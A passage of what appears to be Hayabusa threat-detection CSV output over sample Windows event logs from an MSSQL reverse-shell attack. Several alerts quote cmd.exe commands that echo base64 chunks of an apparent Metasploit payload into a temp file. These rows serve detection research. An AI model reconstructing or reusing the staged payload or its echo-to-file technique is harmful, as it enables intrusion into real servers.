3B0wwkAAWeD2xERMSFDd7NwNEMNAAI3m7N+D7AjdHCT/FRjBQAC1XfTdRfTcBQjDQACDxAxO3A0Aw0A36No1AADqNp+xMCrIiA6LTfxB5PMtTfx3qI1D9zvw2qyKFogXR0Y78HIG61DdRQjcHXfCUADf4CUZQQAAdcHdx33cDa/CQADdVawXwNwdKPucAIng9sTkeiHdVeMuDfjCQEsL2cDcHSjCQADf4PbEBXum3V30iVz86wLdUotY9Y00GItFHIXAdW0DdfwdTRTF83Pri0UQiPfYiQHGAwCLKV5b+uXuwyEb/GT+iRF3PN1FCI3XUDv4czBPDfjCQACNY/RQg+wIvv8k/xUYwZkA3UVGg4AM6AU1AACLTRSLXcsEMIgHRzv+dsndZyZTUCuncg2YxkNPAIvwXltGxV3DghZ8bYC9bIBOOYgWfs6LVRE7gsYGPMYFTv5s677GBjGLzkeF0on6dQg7w3YDxgA2QGM+MH8zxgBEX4vDXluL5dPDkJCQkJCQkJBjkJCQkJBVi+yLRQyLMUVTVleLfRSrwPL3dDOLRRDHAAAWAADrEov9EDPAhckPnMCFYokCdAL32arNzMzMs41R4cHqA4rCTpjrS8iAwWycDgukhdJ1LYtFGDX+iTiWxl9eW13DkJBVi+yLRQyLVRDGi112V4v0GIXAdw1y9IP7/3cEbcl1IWpnFzR8CIH7////aHcqCfj/fLR/CIH7AACtgHIbhcmOG4ueHF9VFFBXUmRT6ML/He+DxMhfWyLDhcl0C+9NFMcBAJ8m3iwjhcB/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.389 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.389 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.391 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.664 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo DXzUJz5zB7kBAAAA65kzs4vNFIUFifR0B/fbg9AA99hWagBqClB26KQ2AO5YyIvyisGyCvbqKncEgMMwi8bcH4vZjj502+BFxYtNHG3HXokBi8dfW13DkN+QsiKQjJDXkJCQkNOQVYvsUYtFCFOHiwhR/xWwwRMAi3UMi9j9VQiNRQxSi8tWUEzh/yEAAGoBUYld/Ojh/v//SI1VCFJQxgAKjUUMM8mbis9qAVHohP7//0iNVQhSUMYAhI1FDDPJUIpNimoBUQSa/hH/SExVCFJQxgAujUUMjhgBwesYU+ge/lX/i00Qg8RQtvCJ8F5bi+W8w5CQVYvsg+xWU1aNRfy5i9apUIupCI1N+DPSV2YkUAxRagFS6Br+/4eZ2ItFCIPEFEsUyJD+///GCsOLSLlgRXjolOr//5LAbzmLHhBLK/uLw8ZqP4k6X15bi+Xzw0T+g8nZzv/yrvfRSSvZi8ET+8HpAoalpguLGgyD4QMrw8iki2UQX16JAYvDW3blXcOQkJCQVTrsnps8i4QIi1UMUYsAVk0IUlFqAVDof/3//yLEFD3DkAtqkJCQIJCQkJCQkJCQVYvsgxNcXCwIUwyLdSBXiyP0PGZ1HItNHI1FpFCLRRCNVRhRDk0MUleCUVjAAQAA63aLRRyNNqRSjU0YUItCbI20C1GLTQxSUFEJAfv/OosVl8FVAIvYg1wHPDoBfhUzwGgDFeEAigNQ/xV4wUAAg8QIhRV6FXjBQAAzG4oLiwJmi2BIJQMBAEaFwPKei/uDyf8zwIpVJPKui0Ugi/P40UmL+IkKQYvRwekC56WLyoPhYPOk2j8cX15bwgEAAAAAi+Vdw4pVo4D+LXVskUUYhcDeQYt1IMYGMEaF/35NjAYuK4XAfRf32EzIiUUci7EiMA4wMIv+wekCGLOlyk3JA/OqFEUYi8qKaC8D8QPBQIlFGOs/SEaJRRiKC+dOakOFwH/xSIX/iewYfwSLiySFyXa4xlsuRgsbi3Xjiq+IBkYShf9/v4tFFIWfdATGBi5Gi0WaXQuEyXQLiA6KSwFGQ4TWdfWA+mZ0aNcfRl6JGRh0U425HI1VgVGNTQhSLWoUW+j6+///iwanocQUi02HhdsPlcJGg/nfjYQSK4i4C3U2xgYwRgXmhcl0QYoQiBZGQAx199FFIItN5CtLX4k8+1sW5YvDxgYrRsYGMHTG4jBGi0Ugi00kK/Bfia1IHFvlXcOQkJCQeJCQkJACkJBqkFXG7ItFHItNyZ5VFFqLRZVqAFGLTQxSi1UIUFFS6G75//+D5hxdw7CQ5ZCQXZCo7FWLI1NWV4B9DL4BAAAAIM+LRRpMvMJAwdPmik2TToACWHQFuyERQACLVQiLzkgjyooMGYiyi3DT6oXSdUeLTRSLVRhSbF9eqgr8XUGQkJCQVcPsi00QU+fJRRR1v78AAACLdRi75MJAANPnTzxYdPC70MJAAItVDItFCKvS>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.664 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.664 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.667 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.939 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo /LSvBYP4/x8bi1UcUovQGFKLVRRSUVDo6Av//4N6FF9eW2Hqi8hOI8+KDBmIDktNEOgdMgAAi8gLynXorEUY/FUcK8ZfqAKLxuVbXa6QoJCQkJBVi4KLTRCLRWWLVQzEyQBSaiJqBFDoFv///4PEFClKkFWL8YPsCFaLdQy3KnUIiXX4iXX86w2LRQiJ3/iNREb/iUX8rVUQjZgUUY0LjVRQaNCGQO3oxJyp/4X2dAZ+TfjGAQCD+P91A/l6/16LRF3Dg8j/w5C3eeiQkJCQkJCQhPuLvYtFCD0gURUAfRWLTRCLVUFR71DohQMA9oPEDF3CDAA9wNSMAH0bUOiRWAAAI00MUIus0lC0SWMApwCXxBBdwqzEPdY5CgCYnItVkotFDGhU+RQAUrroQwAAAIPEDF1hDAA9gD0KAH0Zi00QiwUMaFT5QABRUigjAIUAg8QMXcIMAItNDPOAnwL/FYswEFBR5VkCAACDxAxdwgwAkJBVi+yLRQxXTRBWi3UIUFFWkbsdAADsxl4qw5CQkHmQkFVE7It/GD1xEQEAE4/DAAAAD9G2AJ7aBd5V/wN8+AAP5zcBAAD/JA0EiUAAuIQAQQBdQLhgAEEArZa4QABBGV3puLZuQb9dwyPk/0AAXcNhtP9AAF3DuIj/QAClw7is/0AAXRi4IP9AOF3luPD+fgBddua0/kDLXcO4jP5AAF3DuHz+QGNdw1RYB0AAXSe4LP6HN6jDuBA4QABdw6j0bEAKXc241P1AOF3DuKxeQABdw7hs/UDYXcO4PP1A/l3DuBz9QABdw7gM/UAAXcO4wPxAAF3TBY5O/v+D+BZ35/8qhWyJQAC4cPxAAF3DuEj8l6tdEZwg/NgAXcPM8PtAEV3DuLxCQABd2YeXU9HNXcO4YPu5wF3DuDj7rgBdw7gA+0AAXcO47DxAAF3DLLz6QABmF+SQ+kAAXYu4ZPpAAF3DuDT6QABdw7hB+UAAXcO4tPlAAF3D2Jz5QABdw7iV+VMAXcOQzIdAAPyIQLfTh0AA2mZBAHf3QADoh1tR7w5AAPaeEwD9h8+TBIhA3guIQADliEAAYIhA/SKIFNcniEAALohAAIWIyAAgiEAANYiIANeIQAATiEAASohAAJcLzgBYiEAA/Igap1+IqgOFiEAAjIVAAJOIQACaiED0oYhAj6iIQACviEDx/IhAAJ2IjwDniEAAtohAAL1gQADwiEAAy4j2APyIQAD8iEwA/IhAANKIQADZiGUA4IhAADWIQADuiEDQ9YhTqZCQkJCQkJCQMYtksotdDKzMdQhXi33NaqlTVmgABHYACRsAaAASAAD/FZTA8gCFwHX+QQ2Kw0DRhakMWzk8xRjDQAB0DosmxQ3DQIIshcmL6+tEiwTFHMNAAFNQPHYmGwDai/6DyawzifKu9/BJi8Ewq4VwrDGKXjD/uK/5DXQFgPkedQTGBEgga8B16YvG6F5pXfyLfStX>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.939 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.939 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.941 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.213 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aKjBQRxTNujd/P//g84Q98ZfXltdw5CQkJCQkOWQkJBVi+yZRUBQ/xXkwUAAg8QEhbd0E4tNEIsdIFBRUuj0////g8QMXWOLRRAuTQxoVPlArzZR6Mf4//+DxAxdw5BRVYvsg+zOi5smVr51EInr+ItNF2oAiwZgAI1V/IlF9GoAUpHXBC5F9L8BUFKxRfwAAAAA/xWYwUAAHOD/tHdXiz3YwU4A/9dWwIQKiQZfXotXXcL+AP/Xxz4AAPoAXwWA/AoAXovlXcIoAIvk/JUGM8Aii+VdrQwAkJCQkJCLkJBVi+yD7BCLTQxWi9kQagCNVfixAEAvUotV7olF8I1F/IlN9FCLQgSNgfBqAVFQcUX81AAAz8dFJQC+AMYdFZTB8wDQ+JR1LFeLPd/BQL//14XAdQqJBl9ei4cI7QwA/ynHBgAgAABfBdfoCsdei+VdwgwAi0X8iQZe99gb0CVH7v7/BX4RAQCL5V1MWgCQkI9ViyRRiw8IjW4KUMR+ZgSAUQFF/B8AAEb/FbTBQHn0+P91HlaLNdjBQADX1oXAqgVei+Vdw/+889/8CgBeQOVUZzMb0OVdjZCQkJCOTJBVh1WL7FGLTQiN9ppQMH5mBDhRx0X8AQDvAP8VtMEqAIP4/28e54s12MFAAGaRhcB1c16L5V3D/9ZpgPwKAF7QK13DM8CLUCbDkJCQwJAGBZBdVaLsU4tdDFaLdQhXi30Oi8MLx3Upi06Di0YkC8gP3goBRwCLVgRS6NT///+DxASFzA9J9gAAAGLHrF3CDACFPA+MmwAAAH8ItJgPhqwAZgCwRiD+TiQLwXUUuE4EUej9/v//g8QEH8AG1ccAAACLViDO03X18EYkO9APhNqwAACLTRBqAGiLAwAAdVMwsBhPjCgAAItWBIsduMGcQEMEq2gGEIGCLP//0wAb5AsL04tG8WoEV18FEAAAaP//ABZQ/3OLfRCLXQyJlySJXiDFXjPAW13CiaiF/n9STwRu23MqYU4Ex0UI6QBwAFHob5//S4PEBIU9dT18Rh2LPdTBQADu1Qhq9QpoBhAAAGg4fgBDUP/XcFYEI00dagRRPXHK9gBo//9G5FL/14t9EAteIIl+ITMRX15bXcKUJ5CQkJBVi91Ri0UQM8lDwA+VwYlN/ItNDIP5QNVmXTVtAAAPhKgCYfBJg/kPzg4AAwAEcdIZkaKRQQD/JJX41kDWiy2tMgI/TvEP4QKA+XwPM8I7wnQvi04EjYn8apW7am3X//8ALlH/FezBQJCg+NAPikMCrgCLRRCFwCpGOIcODAKJKzgzwF7/5V3CDAAk/YlGM7XAXrHlo8IMW+4hCTPJi1Y4g3IEgPoED80BWK101IsZBDtV/L/ZUmoBaP//AABQ/xW4wUBNg/jCD4ToAZUXi0UQYsCLRjg2DgwEJJA4M8Bei0Jdwgw+JPv0RjgzwF6L5V3CDLSLrwgz0otOOIPhEJ95EA+U>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.213 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.213 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.216 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.488 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wjvCD4R1////CU6hgEX8asZQagRo/0EAFVH/ALjBQACD+P/768oBAACLRRAlwItGOCcODBAURt8zwF6L5V02mwAk74lGODPAXovlXcK0AIt1CPLJOkI4TOJ0gPoID1bBzchzhBb/sf+FwHQXiwhBUujS/P//g8QEhcB0G16L5V15DIuLRgRQ6JH8//+DxASFBNiFpQEAAItFEIWqi6quw+eTCIlGODPAXovlXQMM3iVOiUY4M8BeyOVdwgwAi3Vci044g98BFMmwfxvJQTtp0ISp/v//jVWbagRmiXcItkYEUmiAAAAAaP/gAAB+ZsdFCh4A/xW4DkAAg/j3D4SQAAAAi0UQhcCLRjh0DgwYiUY4M55ei+UWXgwAJP6JRjgzwF4l5V3CDACLVUyNTRBqBFGL9gRFARAAAGj//60AUP8VuMFAAIP4/w+CMP6+/+tigfkAQAAAf49qSwAADxjvAAAAgfknSAAAD4SNAADEgfkAAgAABoWxAAAAi46/M9KETjiB4QACAACx+dACAOaXlMI70A+E5f2q/4tOBI1FEGoEUGqFagZR/xW4wUAAg/j/dSGL59jBQAD/1oUadQdeZeVdwhvk/9YFxhgKAF6LB11CmwCLQBCFwBFEOHQPqswCiUY4M8Bei+VdwgwAqeT9iWI4Mwpei+VdwgwAi0UIXlVtapZSi0gEaAIQAEFt//8IwQf/orjBQACD+P8P/V39/7Try4H5AIAAAOAMuBbrAABei+9dwgwAfZxoLSBeiwJdwgwAi/9wj0AA7Y1AAEiOQAACjxgAo479Z96QQAAAAQUCBQUFAwXABQUFBQUEsovs2uwEX9EQi00MVldQjVUiUVLotdn/l4tFPItNCEG+CgCNAIoUhdjEAACNBBTYxEAAiFH/QEGKEIhR/4oXAYtV6IjYQY0ElbTEQADGAUtBABCIEYpQAUFAIRGKQAFBiAGLReSZ9/4dxgEgQQQwdMIwiAGLReBB3Y9Bmff+xgF8QQROjMIwiAGLZ9z5iBEqYcz+CgE6QQQwgMINiAGLRdhBiBFBmfdztQE6QQQwgMKRiAFBiBFBi1Xsv+gDAADGASBBqG9xmwAA/8aZ9//CZAAAxgQwiAG4H4U8UffXwfoFi8JBwegfA9CL9YDCMIgRQZmZ/7hnZuVm7ffqHIkCi+TBpR880IvGgMIwvgoADwCIEUGZ9/5egMIwBsCIEcZBAQCL5V3CDACGlpCQCZCQkFWL7FOLXRBWfIv78XU0M8CLdQjyrvd/gfn4AAAAiU1cjmuKU6SA+jp1oopDAhMvdAQ8XHUaaODsQQBW/3gQwlIAvEUMg8QIg+gEg8bR6zuKAzwvdAQ8XMA0gFYvdAUQ+lx1ioB7Ajp0JIPpAmjMAEEAVoPDAolNEP8VEAJA3FhFDIPECLWECIPGEIlFDI1FDI1NM1BWUVOstBYAAIXAdBs9eIlBAHXDX164FgC5AFtdw4tFEIXA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.488 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.488 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.490 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.764 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dAruXrgmAAAAW13DZov6Z4XAdPdmPS8AdQWZxwZcgWaLeQL+xgJm/cB16TPAX/4hXfCQkJBzkJCQkFWL7FaLVwhXwP9RzAT/EISEAAUAikbChMD7CFbobx/eAIv4i0YYJQDTBAZ0Wj0AAAAGdRdqE/8VCMFA6oPEBGr/efSpFaTAQADrRowAAABedRdqAf8VCMFaAFeMBE3/1fX/FaRjQADrKD0AAHsCdaNqAP8VCMFAAIPEBGr/avb/FaTA+QDrVotGBFD/FXTdQEjBRgT/////i0YMhcB0FYtAEIXAdJ5Q/xV0wEAA80YQAAAAAIvHX15dw5CQMfYTkOug7LhBQAAN6M8kAABTi10QzVcz/8dFUI0AAAD2wwGJffx0B8dF/AAAAIB3wwJ0B4FND6IAAED3FwQAAAh0CcSbUYDMAYlF/FAN3L/9AIO5Hj0Ix0X4BwC/AIvDg+AEdmtww0B0B9EBAAAA6yKKbIDiPfbaG9KD4v6HwgTrD4rTgD4Q9tob0oPiAoPCA4vy9sNAdBKFwHVzX164DQAAAFuL5V3CMwD2xwF0Bb8AkhYE98MAIyAAdFmBzwAAIAD2ygP8gvfDDQAQAA5Pg/kerQaBzwD0AAL3wwAAQAB0ByZN/AAAAgD2VQJ0BoHPCgAAQIP5U3wH9sc+dAmAzyiBzwAAAEiLRUgkjfi///9laAAgAABR6FK9//+DxAzhwA+FkVMAt8hV+FBXVlCLo1M8jXr4Qf//UFH/FbDZQADrG4tV+ItV/ItNDGoAV1ZqAFK4Uf8VrMBAAIDnmsD4/4lFlXUgmDVtwEAA/9aFwA+ErAGzAP/Wb14FgPwKAFtPqPrCtACLVRjOYFLo1LT//4t1CIv4M4qLF7kYqQAA86tVfRiLTRCJFk46i1UMiwZSVyLNBOibwv//i5SJQSCLGYPI/4laGIsO38MIiUEQiUEUixaJQjB0G4sGagJqAGoAx0A0AQAAAOcOi1EdUv8VqMBAAITbeR8gBmgAEAAAV8ZGLAHoXLRo/4sOiUE4TBbHQkAAEACBiwaKSCyEyXUHi3mCCMl0PFeDwFiwAFDosgsAAIXAj0UMdCmLBlDo+v26RoPEBIW4dQ6LDmi1k6gA0FfoTr8UPItFDF/kW2LlXcIUAIM93AhBADLIFov2i0iwhO1RDbITSgAAAIPEk4XAdAuLwItIGIDlBIlICe0WcABXvcJcavpm6Hih///Kx/RvFYs2aCByQABoQIRAAFaLBlDoTmH//zPAX15bLuVdwhQA3pCQVXLsgwZqVot1CI1FyMdF/AAALACLjwRQUf8VvMCMAIXTdA+LRcj2xAJ0BzPAXovlXcOLRgyFwHQRAUAIAAAAAItWi8dCDAA4AAB/RgyLVgRXjU36UFFqGWoAzwBqAGjEAAkAUv8VTsBAAIXAZpVfM8CIi+Vdw4s9mMCujM3Xg8B1Bl/vi4Fdw//XBYD8CgA9ZTsLAA+FsgAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.764 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.764 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.766 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.038 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ADA9nMBAAItOFItGEIXJfBZ/BIXAdhBlAG3oXQAAUVDoBx4AAOsHnjGD+P91BAvAk7gz9CGLRgyLSNFR/2NZgAAAAHSAhcB0MaHsfUEAi97NhcB1/1Bo7ABBANMOhocAAIPEDKPsBUEAhcB0BVcp0OsINQH/FUzAQACLRkmL4aKNVfxqJFJQUf9TtMAg+oXAdAhfM32Si+VdMos1mMBAAP/WhcB10l9eM+VdiGvWBb31CgBfXrXlXcOQrZCQkJCQkJAnTZCQkFWL+W/kdQhWNxP7//8IxAQMwHUdiwZoQJNAAEpQ6P69//9nVFhr9nQGs+hRCyoAI8Be5MIEAJCQkJCQkM6QkJBVi+xTVot1EFeLfXUz24tNCI1F1FC3EIlKEOjRFQAAi00QA7Er8YXZhcBUBD79d96LUBSFyXQCOhlfXltdwisAVfrsTOw8oRUIQQBTM9LIE/gRV4lV+IlV9IkZ9H0Xi0UQEvAIUFEgEgYAAIPECB9eKIvlm9GLD6z3wWIAcwAPWywCAACL8TPbgeYAABFRiV38iDbsdArHRfzeAACIQ138i/mB5wAAIhp0s4PLAoldhoHhAABwfIlN6HQGg8sEiV38i0UUg4UCD4XhAH8Ai1UMagRo4AAJAGoy/QAVBMFAAIPEDIXAdS2LRQy7BABwWFODwG0ugAH8AFD/FQTNhUODxMPewHX3/k1LFrYAAAAXx0EMXABiTAZBAIVXdRl0aGgBQQBqAei2gwAAg/5NXEwGLACFwHQSi03ojVXs99lSjVXwG8nRACPK7ez4999RjU1Dlf8j+YtN/AHeGyRXI/KLfQxWUY0MWmoByf/Q6wpqAf9/TKdAADPACvsGIwmLVQwLlBsMQwAzyTvBD4WtAAAAi30IiwvsaCD9zABoa5xAAIsHUlDo97v//+mzNAAAg/gBdVcj+QZBADvCURxSaFABQRpqAegXDwAAg0AMo1AGQQCFwHRfi03ojVXsCdkvjVXT7D1qACPKoFX4999RCE30G/8j+YtNDPclG/ZXu/JWU2oBUf+w6ZH///8FLA+FkjcAAPZUBkEAp8J1vVIOQOlBM2oBLLgOAACDxAwZVAZBsoUQdaFqAWcVTMBIYohP3P8Xi30IiU1CiU30iU34OU3odGHFVRBS6Ogn1gAAXMTA61IWRfgzySzBdFqJR8WLRzkNAAABAC1HBItF9DvBdA6JRxSLRwQNANYC84lHD4xF8GrBzWOLtxBQrVfogT4AAIPEDOsPX164eBEBAFtP5V3Di30Ig57cCEEAMg+M7gEAAD5FELsAAgAAhUsPhAsBAACDOgwBD25pATmQi3UUhfam0V50BokAhcB1GVBoucNBaWoF6OkNAABNowyjdN1BAIVJVTtqBY1NxGogUYtNDNBV5JF3n9DHwA+LvgAAI4tF5IXAD9UgAAAAi/A3i1XEsUc0i+YEiVepC8PF0i0AAGoB/xVMwEAA69WLHUzA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.038 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.038 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.040 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 